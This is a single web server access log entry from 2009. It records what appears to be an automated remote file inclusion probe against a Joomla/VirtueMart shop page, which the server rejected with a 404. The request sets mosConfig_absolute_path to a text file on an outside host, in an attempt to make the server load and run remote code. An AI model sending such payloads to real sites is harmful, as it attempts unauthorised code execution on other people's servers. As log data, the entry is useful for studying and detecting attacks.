95.110.198.81 - - [16/Dec/2009:07:26:59 -0600] "GET /logs/access_log.1249689600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
